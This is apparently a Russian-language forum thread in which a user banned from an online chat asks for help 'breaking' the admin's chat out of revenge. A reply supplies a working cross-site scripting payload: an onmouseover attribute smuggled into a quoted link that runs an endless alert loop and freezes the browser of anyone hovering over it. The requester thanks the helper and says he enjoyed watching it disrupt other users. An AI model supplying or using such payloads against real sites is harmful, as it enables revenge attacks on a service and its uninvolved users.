ну... дело было так... я свою работу бросил, а денег не было... тьфу, о чём это я? короче поругался я с админом одного чата, ему типа не понравилось, что я дурил(матом не ругался), просто фигню всякую писал, не много и эта фигня не задевала кого-либо. но админу это не нравилось ну и он меня выкинул мля, конечно у меня до..уя анонимных проксей, но он их отрубал как тока я туда заходил, короче я решил этой РОЖЕ отомстить, а силёнок мало, ну ламер я в этом! а пачкой в грязь падать не хочу! помогите ПОЛОМАТЬ его СРАНЫЙ чатик мля! УМОЛЯЮ ВАС!!! бабла вам не смогу заплатить (ну нет его у меня   пожите?
Есть небольшая уязвимость: проходит onmouseover в теге <A> Например такое сообщение: </span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Цитата </td></tr><tr><td id="QUOTE">http://aaaaaaaaaaaa.dsadsds.dssssssss/?"onmouseover="for(;alert()[/QUOTE]<span id='postcolor'> приводит к зацикливанию браузера, у того кто проведет мышкой по надписи
Спасибо Algol ! Мне стыдно это говорить, но я повеселился!!! Оч. мало людей понимали, что происходит... здорва